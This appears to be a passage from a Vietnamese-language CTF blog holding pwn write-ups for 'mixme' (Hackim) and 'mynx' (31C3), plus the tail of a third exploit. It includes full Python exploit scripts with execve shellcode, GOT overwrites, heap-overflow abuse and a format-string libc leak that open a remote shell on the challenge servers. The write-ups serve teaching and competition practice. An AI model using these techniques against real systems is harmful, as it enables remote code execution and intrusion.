  t = s.recv(4096)
  print "[RECV]", t
  return t

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect (( "54.163.248.69",9004 ))

recv(s)
recv(s)

#Add 3 notes, Type 0
for i in range(3):
	send(s, "1\n")
	recv(s)
	send(s, "0\n")
	recv(s)

#Edit note id=2, Type=0, shellcode
send(s, "3\n")
recv(s)
send(s, "2\n")
recv(s)
send(s, "0\n")
recv(s)
#shell
shell = "\x6a\x0f\x58\x83\xe8\x04\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"
send(s, "\x90"*20 + shell)
recv(s)

#Edit note id=0, Type=1, overwrite header and change g0t.plt
send(s, "3\n")
recv(s)
send(s, "0\n")
recv(s)
send(s, "1\n")
recv(s)
#magic bytes
send(s, (0x80-12)*'a' + "\x04\xc1\xeb\x0f\x1c\xb0\x04\x08")
recv(s)

#jump to shellcode by function was changed in g0t.plt
send(s, "1\n")
recv(s)
send(s, "0\n")
recv(s)

send(s,"cat flag.txt\n")
recv(s)

#flag{y0u_br0k3_1n70_5h3rl0ck_m1ndp4l4c3}

s.close()

flag{y0u_br0k3_1n70_5h3rl0ck_m1ndp4l4c3} !!!

So long and deep, go get some sleep :'( . Chim!

[Write Up] Hackim CTF - mixme - PWN5

Đánh giá sơ lược về binary:

~/Sources/CTFs/hackim » file mixme                [email protected]
mixme: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=b93d20dd523097dd7d53a7fda265a2d977d29c30, stripped

Checksec:

Chương trình có 3 lệnh chính: (store/edit/get)

Phân tích hàm edit

Đựa trên hàm store, mình có thể reverse lại được cấu trúc lưu trữ của chương trình như sau:

struct node{
 char name[16];
 int size;
 char *data;
 struct node *next;
 struct node *prev;
}

size là khích cỡ vùng nhớ được malloc cho data.

Các node được lưu trữ bằng một danh sách double linked list circular

Vùng nhớ tổ chức trong mem như sau (tạo 2 block với data size = 16:

Gồm 3 block: block head được khởi tạo mặc định khi chạy chương trình.

Để ý phần data của block được cấp phát là 1 đoạn đằng sau block, tôi sẽ đề cập sau ở phần khai thác lỗi.

Phân tích hàm edit

Nhập name,và size, hàm sẽ duyệt qua linked list để tìm ra block có tên tương ứng, và cập nhật lại phần data.

Để ý phần sau:

Chương trình đọc từ stdin vào data nbytes, mà nbytes không check length.

Nếu tạo 2 block liền nihau thì, phần tiếp theo phần data của block 1 là block2 nên ta có thể overwrite được cái block 2.

Phân tích hàm get:

Nhập vào tên block và size, tìm ra block tương ứng, in phần data ra màn hình, free vùng data và block, cập nhật lại linked list. Để ý write(1,node->data,n); mình sẽ dùng nó để leak addr

Khai thác lỗi.

Ở đây mình sẽ overwrite địa chỉ data bằng địa chỉ của một hàm trong bảng got bằng cách lợi dụng phần read(0,node->data,node->size)

Để ý hàm free(node->data) nhận input là phần data nhập vào, ý tưởng là overwrite free trong bảng got là system và ta có, system(node->data).

Payload của mình làm theo các bước như sau:

 1. Tạo ra 2 block peter123,lol123 với data size của mỗi block là 16 bytes
 2. edit block peter123: với size 56, 'D'*28 + '\x00' * 16 + 'CCCC', với CCCC => địa chỉ hàm free, sở dĩ mình padd '\x00'*16 byte để làm name của block2 = 'DDDD'.
 3. edit block 2 ('DDDD') với size 4 bytes để ghi đè free trong bảng got ở đây mình ghi đè got bằng địa chỉ của lệnh ret, mục đích là để bypass qua hàm free, vì mình lợi dụng lệnh ret để leak 1 địa chỉ trong bảng GOT.
 4. get block 2('DDDD') minh sẽ leak được 1 địa chỉ trong bảng GOT, từ đó tính được địa chỉ hàm system.
 5. Tạo tiếp 2 block bất kì (b1,b2) với data size của mỗi block là 16 bytes
 6. edit block1('b1') ghi đè địa chỉ data của block 2 bằng địa chỉ free một lần nữa
 7. edit block2() để ghi đè free bằng system.
 8. Tạo ra block 'shell' với phần data='/bin/sh'
 9. get block('shell') và boom đã có được shell

Payload: http://pastebin.com/n2G30Fk4

[Write up] 31C3 mynx

Đây là một bài khá hay, mình phải mấy mấy tiếng đồng hồ để phân tích code.

Đầu tiên chương trình tổ chức bộ nhớ, cấp phát như sau:

Cấp phát 1 vùng nhớ 0x1000 bytes đầu tiên, và set 4 byte kế tiếp là length <địa chỉ vùng nhớ><độ dài phần tử>(1)

Vùng nhớ 0x1000 bytes này được chia nhỏ ra 16 phần, 1 phần là 256 bytes.

Nếu vùng nhớ 0x1000 bytes này hết , chương trình sẽ tạo 1 vùng nhớ khác tiếp theo như (1)

Cấu trúc của một ascii art được phân bố như sau:

struct ascii_art{
   char tag; // tag của ascii_art có giá trị bằng 'I'
   int id;
   void (*filter)(char* content);
   char content[247];
};

Cấu trúc của một comment được phân bố như sau:

struct comment{
  char tag; // tag có giá trị bằng '7'
  int id;
  char content[251];
}

Xem xét đoạn mã sau:

Sau khi tạo 1 block comment, chương trình đọc vào vùng content với giá trị là 252 bytes (lố 1 byte) dựa vào đây mình sẽ khai thác được lỗi, ghi đè giá trị tag của block kế, biến block comment -> block ascii art, từ đó fake được filterfunc.

đoạn mã trên dùng để trigger bug khi biến block comment -> block ascii art

Các khai thác lỗi:

Tạo 1 block ascii art, tạo 2 block comment cho block ascii 1 , tạo block ascii art 2
+----------------------+
| Ascii Block 1    |
+----------------------+
| comment 1(1)    |
+----------------------+
| comment 2(1)    |
+----------------------+
| Ascii Block 2    |
+----------------------+

Xóa hết comment block 1, tạo lại comment cho block 1 và block 2, dùng comment block 2, overwrite giá trị tag của Ascii Block 2 thành comment, dùng comment block 1 để overwrite comment block 2 thì Ascii Block 2

+----------------------+
| Ascii Block 1    |
+----------------------+
| comment 1(1)    |
+----------------------+
| comment 1(2)    |
+----------------------+
| Ascii Block 2    |
+----------------------+

Trạng thái cần đạt được

+--------------------------------+
| Ascii Block 1         |
+--------------------------------+
| comment 1(1)         |
+--------------------------------+
| comment 2(1),block 2 fake   |
+--------------------------------+
| Ascii Block 2, comment 2 fake |
+--------------------------------+

Trigger bug và ta có

Do mình có thể control được filter_func và content, cho nên mình sẽ dùng printf và fmt để leak được địa chỉ __libc_main_start ở trên stack, từ đó tính được địa chỉ của hàm system

Payload:

import socket
from struct import *
import telnetlib

#+------------------+
#|	Ascii Block 1 	|
#+------------------+
#|	comment 1 		|
#+------------------+
#|	comment 2 		|
#+------------------+
#|	Ascii Block 2 	|
#+------------------+

def connect(host,port):
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((host,port))
	return s

def add_ascii_block(s,block):
	s.send('1\n')
	s.recv(1024)
	s.recv(1024)
	s.send('1\n')
	s.recv(1024)
	s.send(block)

def add_comment_block(s,block):
	s.send('1\n')
	s.recv(1024)
	s.send(block)

def select_block_id(s,block_id):
	s.send('3\n') # select
	s.recv(1024)
	s.recv(1024)
	s.send(str(block_id) + '\n')
	s.recv(1024)
	s.recv(1024) # comment menu

def back_to_main_menu(s):
	s.recv(1024)
	s.recv(1024) # comment menu
	s.send('0\n') # back
	s.recv(1024) # main menu
	s.recv(1024)

def leak_mem(s):
	__libc_main = 0
	fmt = '%p'*22 + '%s'
	payload = pack('<I',0x8048420) # printf
	payload+= fmt + 'A'*(0xfb - 4 - len(fmt)) + '7'

	s.recv(1024) # banner
	s.recv(1024) # main menu
	add_ascii_block(s,'A'*0xf6 + '\n') # add ascii block
	s.recv(1024)
	s.recv(1024) # main menu
	select_block_id(s,1)
	add_comment_block(s,'C'*0xfb + '\n') # add comment of block 1
	s.recv(1024)
	s.recv(1024) # comment menu
	add_comment_block(s,'C'*0xfb + '\n') # add comment of block 1
	back_to_main_menu(s)
	add_ascii_block(s,'B'*0xf6 + '\n')
	s.recv(1024)
	s.recv(1024) # main menu
	select_block_id(s,1)
	s.send('2\n') # remove all comments of block 1
	s.recv(1024)
	s.recv(1024) # comment menu
	add_comment_block(s,'D'*0xfb + '\n') # add comment of block 1
	back_to_main_menu(s)
	# add comment to block 2, change ascii block 2 into comment block 2
	select_block_id(s,2)
	add_comment_block(s,payload)
	back_to_main_menu(s)
	select_block_id(s,1)
	# change 1st comment of block 2 into block 2
	s.send('2\n') # remove all comments of block 1
	s.recv(1024)
	s.recv(1024) # comment menu
	add_comment_block(s,'A'*0xfb + 'I') # mark that comment 1 of block 2 is block 2
	back_to_main_menu(s)
	select_block_id(s,2)
	s.send('3\n') # trigger bug
	d = s.recv(1024)
	if '\xf7' in d:
		index = d.index('\xf7')
		__libc_main = d[index - 3:index + 1]
		__libc_main = unpack('<I',__libc_main)[0]
	s.send('0\n') # back
	s.recv(1024) 
	s.recv(1024) # main menu
	return __libc_main

def exploit():
	s = connect('188.40.18.80',1234)
	__libc_main = leak_mem(s)
	offset = 149824 # Ubuntu 14.10

	if (__libc_main & 0xf7000000) == 0xf7000000:
		system_addr = __libc_main + offset

		cmd = '/bin/sh\x00'

		payload = pack('<I',system_addr)
		payload+= cmd + 'A'*(0xfb - 4 - len(cmd)) + '7'
		print '[!!!] System(): ',hex(system_addr)

		add_ascii_block(s,'A'*0xf6 + '\n') # add ascii block
		s.recv(1024)
		s.recv(1024) # main menu
		select_block_id(s,3)
		add_comment_block(s,'C'*0xfb + '\n') # add comment of block 1
		s.recv(1024)
		s.recv(1024) # comment menu
		add_comment_block(s,'C'*0xfb + '\n') # add comment of block 1
		back_to_main_menu(s)
		add_ascii_block(s,'B'*0xf6 + '\n')
		s.recv(1024)
		s.recv(1024) # main menu
		select_block_id(s,3)
		s.send('2\n') # remove all comments of block 1
		s.recv(1024)
		s.recv(1024) # comment menu
		add_comment_block(s,'D'*0xfb + '\n') # add comment of block 1
		back_to_main_menu(s)
		# add comment to block 2, change ascii block 2 into comment block 2
		select_block_id(s,4)
		add_comment_block(s,payload) # real payload
		back_to_main_menu(s)
		select_block_id(s,3)
		# change 1st comment of block 2 into block 2
		s.send('2\n') # remove all comments of block 1
		s.recv(1024)
		s.recv(1024) # comment menu
		add_comment_block(s,'A'*0xfb + 'I') # mark that comment 1 of block 2 is block 2
		back_to_main_menu(s)
		select_block_id(s,4)
		s.send('3\n') # trigger bug
		print '[!!!] Shell is comming'
		# interact socket with stdin,stdout
		t = telnetlib.Telnet()
		t.sock = s
		t.interact()

exploit()